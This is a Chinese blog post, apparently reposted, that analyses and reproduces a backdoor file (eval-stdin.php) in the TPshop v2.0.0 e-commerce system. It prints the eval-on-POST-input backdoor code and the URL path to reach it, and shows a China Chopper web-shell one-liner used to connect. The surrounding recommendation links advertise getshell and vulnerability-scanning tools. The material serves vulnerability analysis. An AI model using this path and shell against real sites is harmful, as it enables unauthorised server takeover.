TPshop商城 Getshell后门文件分析与复现

最新推荐文章于 2024-05-31 18:14:17 发布
最新推荐文章于 2024-05-31 18:14:17 发布
阅读量1.2k 收藏 2
点赞数
文章标签: php shell
原文链接:http://www.cnblogs.com/ichunqiu/p/7832657.html
版权

本文作者:i春秋签约作家——Laimooc

官网地址:http://www.tp-shop.cn/

影响版本:TPSHOP v2.0.0

后门文件:eval-stdin.php 内容:

 

<?php  eval('?>' . file_get_contents('php://input')); ?>

分析:

使用

 

file_get_contents('php://input'))

接收POST请求的原始数据流

eval函数来执行。

我们把代码复制下来,本地调试如下,惊喜不,喜欢不,兴奋不:

1.jpg

利用方法:

访问后门文件 url/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php,post请求发送数据即可实现getshell。

2.jpg

那么问题来了,既然可以执行php代码,那么我们就直接配置菜刀连接.

采用写入的话就有点麻烦了。

地址:

http:xss.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

配置:

<O>
<?php eval($_POST[c]);?> </O>

3.jpg

4.jpg

转载于:https://www.cnblogs.com/ichunqiu/p/7832657.html

dfdhxb995397
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
tpshop商城分销源码可运营的,已亲测,Thinkphp5开发的tpshop分销源码
12-10
网上很多b2c分销功能不能用,后台支持一键升级,付费购买过来,已测试,程序有点大,无法直接上传,放在网盘
TPshop的支付证书url直接访问漏洞
weixin_34111819的博客
12-13 281
2019独角兽企业重金招聘Python工程师标准>>> ...
1day 未公开 Tpshop后台sql注入漏洞
最新发布
weixin_43167326的博客
05-31 478
TPshop开源商城系统( Thinkphp shop的简称 ),是深圳搜豹网络有限公司开发的一套多商家模式的商城系统。适合企业及个人快速构建个性化网上商城。包含PC+IOS客户端+Android客户端+微商城,系统PC+后台是基于ThinkPHP MVC构架开发的跨平台开源软件。
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 793
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
ueditor php上传漏洞,Tpshop Ueditor.php任意文件上传
weixin_33181159的博客
03-11 1004
in `/application/admin/controller/Ueditor.php line 80`, when action=uploadfile, FILES lead to function `upFile````case 'uploadfile':$fieldName = $CONFIG2['fileFieldName'];$result = $this->upFile($f...
ThinkPHP v5.x命令执行利用工具(可getshell
热门推荐
Fly_鹏程万里
12-13 1万+
漏洞验证 命令执行 getshell 工具下载 https://download.csdn.net/download/fly_hps/10848910 免责声明 该工具只能授权验证网站漏洞和站长验证漏洞使用。 禁止用于未授权测试,非法入侵,否则一切后果自负,和作者无关...
域名批量采集+漏洞检测 V2015 绿化.rar
11-15
域名批量采集+漏洞检测 V2015 绿化 ,可以下载学习
某集团任意文件下载到虚拟主机getshell的方法
09-30
本文将深入探讨如何利用某集团的任意文件下载漏洞实现对虚拟主机的getshell操作。首先,我们需要理解什么是任意文件下载以及它是如何产生的。任意文件下载通常发生在网站允许用户通过URL参数指定要下载的文件名,但...
批量getshell工具新
12-21
批量getshell工具【2023最新】这是一种内部有多个漏洞,可自动进行url采集,自动爬虫多个引擎和友情链接url,过狗一句话,轻松日出上千。
基于tpshop开发多商户源码支持手机端+商家+门店 +分销+淘宝数据导入+APP+可视化编辑
05-05
tpshop多商户源码,tpshop商城源码,tpshop b2b2c源码-支持手机端+商家+门店 +分销+淘宝数据导入+APP+可视化编辑 tpshop商城源码算是 thinkphp框架里做的比较早 比较好的源码了,写法简明 友好面向程序猿。 这是一款前几年的本 虽然后台看着老了些,丝毫不影响功能的完整使用。前几年这套卖几万的源码 这套源码还算是比较全的。 支持pc h5 小程序 APP 多商家 门店 分销 等等 更多本一曲源码也会相继发布出来,供大家学习参考!源码仅供大家学习参考交流。
TP-SHOP支付宝+微信免签约插件
12-29
所有文件都是新增。支付宝可以直接上传到插件目录。但是微信支付没有回调跳转地址的,所需新增了一个文件用于查询订单状态。需要保证前台能访问,所以在Application项目里面新增了一个查询文件。是安全文件。放心使用。 plugins里面的文件是微信扫码支付样式文件。微信扫码支付成功后会自动跳转。 将整个文件夹里面按照目录上传即可。 上传后在网站后台插件管理,安装插件,然后配置信息。
某shop后台sql注入漏洞
bishan4656的博客
07-05 876
前言 最近看了下tpshop,审计出几个鸡肋的漏洞,这个SQL注入漏洞是其中之一。然后审计完网上搜了一下发现有一堆后台的sql注入漏洞,应该是觉得后台的SQL不用修叭(我个人是可以理解的)。 漏洞触发点 首先要登录后台,这也是我说漏洞很鸡肋的原因。漏洞位于在后台的商城-》文章->文章列表处的搜索抓包,存在漏洞的参数是keywords,当输入payload' or length(databas...
day17 个人博客项目&TP框架&路由访问&安全写法&历史漏洞
wanjia01的博客
06-04 973
#知识点:1、基于TP框架入门安装搭建使用2、基于TP框架内置安全写法评估3、基于TP框架实例源码安全性评估TP框架开发的CMS#实例-CMS源码-EyouCMS&Fastadmin&YFCMFAdminLTE后台管理系统layui后台管理系统thinkcmfH-ui.admin后台管理系统tpshopFsatAdmineyoucmsLarryCMS后台管理系统tpadmin后台管理系统snake后台管理系统ThinkSNSDolphinPHP后台管理系统WeMall商城系统CLTPHP齐博CMSDSMAL
Nginx配置错误
N的博客
12-24 1459
Nginx配置错误
ThinkPHP V5.0.5漏洞_【权威发布】近日重点网络安全漏洞情况摘报
weixin_39669701的博客
10-29 219
网络安全大家好,小编近日将国内主流网络安全媒体发布的重要网络安全漏洞进行了梳理汇总,在这里分享给大家学习。让我们来共同提升网络安全防范意识吧。!01Xiaomi路由器存在输入验证错误高危漏洞Xiaomi router R3600是中国小米科技(Xiaomi)公司的一款无线路由器,该路由器存在输入验证错误高危漏洞,该漏洞源于set WAN6接口中的过滤器可以被绕过,导致远程代码执行,攻击者...
tpshop的使用环境配置
码小跳的博客
08-22 4410
最近在使用tpshop开发某公司的一个商城项目,将环境配置过程记录一下。 大致步骤: 1.下载tpshop源码 2.下载并安装php集成开发环境(wampserver软件安装包) 3.调试Tpshop源码  下载tpshop源码 进入tpshop官网 http://www.tp-shop.cn 进行下载 点击免费下载进入下载页面: 点击 下载TPshop源码(即第一个按...
myshop网上商城后台存储型XSS漏洞
fansenliangren的博客
11-30 313
xss漏洞原理:攻击者提交的XSS代码被存储到服务器上的数据库里或页面或某个上传文件里,导致用户访问页面展示的内容时直接触发攻击者的代码。
禅道12.4.2后台权限漏洞复现:Getshell分析
"禅道12.4.2后台管理员权限Getshell复现" 本文详细介绍了禅道12.4.2本中存在的一种安全漏洞,即任意文件下载漏洞,该漏洞可能导致攻击者通过FTP下载任意文件,并在特定条件下执行PHP代码,从而获取服务器的shell...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值